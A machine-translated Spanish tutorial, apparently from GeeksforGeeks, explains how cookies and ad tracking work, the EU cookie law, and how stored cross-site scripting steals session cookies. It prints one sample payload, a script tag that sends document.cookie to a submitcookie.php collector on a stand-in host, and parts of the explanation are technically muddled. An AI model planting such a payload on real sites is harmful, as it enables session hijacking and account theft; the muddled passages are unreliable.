Seguimiento y robo de cookies mediante Cross-Site Scripting

Posted on by Rudeus Greyrat

Cómo se utilizan las cookies en un sitio web 

Una cookie es una string alfanumérica generada aleatoriamente que se genera cuando visita una página web y esa página web la envía a su navegador para que se mantenga como un registro de su presencia en ese sitio web para que pueda ser reconocido por ese sitio cuando lo visite. nuevamente debido a su sesión anterior (conocida como ID de sesión). Pero ese no es el único propósito de las cookies, también se utilizan ampliamente para realizar un seguimiento de sus preferencias en línea y viajan de un servidor a otro y pueden ser interceptadas y robadas con bastante facilidad. Este artículo analiza cómo las cookies se mueven por la web y cómo pueden ser robadas.

El camino de las galletas

Como se indicó anteriormente, cuando solicitamos una página web a un servidor, el servidor se pone en contacto con ese sitio y muestra la página web en nuestra máquina local. Al representar la página web, que es principalmente HTML, CSS y algo de JavaScript, también envía una cookie (cookie de primera parte) que identifica la sesión. Además del sitio web, cuando visitamos una página web, a menudo vemos muchos anuncios. Estos anuncios en realidad no son parte de ese sitio web, pero se suministran desde diferentes servidores de todo el mundo al sitio web a cambio de dinero. Cada vez que hacemos clic en uno de estos anuncios, envía una cookie a su servidor respectivo, y el servidor la almacena para realizar un seguimiento de nuestras preferencias. Los servidores también se comunican entre sí y forman una red publicitaria, compartiendo sus preferencias y mostrándole anuncios de acuerdo con esas preferencias en el futuro. Por lo tanto, múltiples entidades en línea lo están rastreando y observando todo el tiempo sin saberlo. Teniendo esto en cuenta elLa directiva de la UE  aprobó algo conocido como «La Ley de Cookies» según la cual el sitio debe solicitar su permiso para usar cookies. Es por eso que ve un mensaje en un sitio determinado como «Este sitio usa cookies para mejorar la experiencia del usuario…» que solicita su permiso. La Ley de Cookies es una pieza de legislación de privacidad que requiere que los sitios web obtengan el consentimiento de los visitantes para almacenar o recuperar cualquier información en una computadora, teléfono inteligente o tableta. Fue diseñado para proteger la privacidad en línea, haciendo que los consumidores sepan cómo se recopila y utiliza su información en línea, y dándoles la opción de permitirlo o no.

robo de galletas

Es posible que las preferencias de compra no se clasifiquen como información confidencial sobre un individuo, pero los carritos de compras en línea y los detalles bancarios son datos realmente confidenciales y un sitio también recuerda todo esto con la ayuda de las cookies de sesión. Si un atacante logra obtener sus cookies de sesión, esa persona podrá hacerse pasar por usted y ese sitio y tendrá acceso a sus datos bancarios y a su carrito de compras de Amazon y podría ordenar cosas de su cuenta de Amazon a su cuenta. abordar el gasto de todo su dinero. Esto generalmente sucede cuando el sitio tiene una vulnerabilidad y el atacante usa algo conocido como secuencias de comandos entre sitios (XSS) para explotar esa vulnerabilidad. Esto se encuentra principalmente en sitios web mal codificados donde el desarrollador se olvida de incluir ciertas medidas de seguridad para evitar que un atacante ejecute un script entre sitios.

¿Cómo usan los sitios web XSS para robar cookies?

Voy a explicar esto con un escenario hipotético. Entonces, digamos que visitamos uno de esos sitios vulnerables que tiene una sección de comentarios. Ahora, en un sitio web ideal y seguro, una sección de comentarios solo debe tener texto en inglés simple, pero en un sitio no seguro, si publicamos un código en la sección de comentarios, el sitio pensará que es un código del lado del servidor y es se supone que debe ejecutar ese código. 

C

<script>   
    document.write('<img src="http://localhost/submitcookie.php? cookie ='
    + escape(document.cookie) + '" />);
</script>
  • Este código, cuando se publica en la sección de comentarios, engañará al navegador para que piense que es un código Javascript (debido a las etiquetas del script) enviado por el servidor y hará que lo ejecute.
  • Cuando algún usuario que visita el sitio mira la sección de comentarios, verá un enlace a una imagen en la sección de comentarios que en realidad es el resultado de la ejecución del script.
  • Cuando un usuario hace clic en este enlace pensando que es una imagen (mientras que en realidad es un archivo php), obtiene una imagen en la sección de comentarios. Lo que no saben es que este enlace ejecutó silenciosamente un archivo php que toma su cookie.
  • Ahora, la cookie que tiene la ID de sesión de ese usuario se guarda en la base de datos del atacante y el atacante puede hacerse pasar por ese usuario en ese sitio.

Artículo relacionado: 

Cómo se utilizan las cookies en un sitio web 

Secuestro de sesión 

Referencias: Computerhile – canal de YouTube 

Este artículo es una contribución de Palash Nigam . Si te gusta GeeksforGeeks y te gustaría contribuir, también puedes escribir un artículo usando write.geeksforgeeks.org o enviar tu artículo por correo a review-team@geeksforgeeks.org. Vea su artículo que aparece en la página principal de GeeksforGeeks y ayude a otros Geeks. 

Escriba comentarios si encuentra algo incorrecto o si desea compartir más información sobre el tema tratado anteriormente.

Publicación traducida automáticamente

Artículo escrito por GeeksforGeeks-1 y traducido por Barcelona Geeks. The original can be accessed here. Licence: CCBY-SA

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *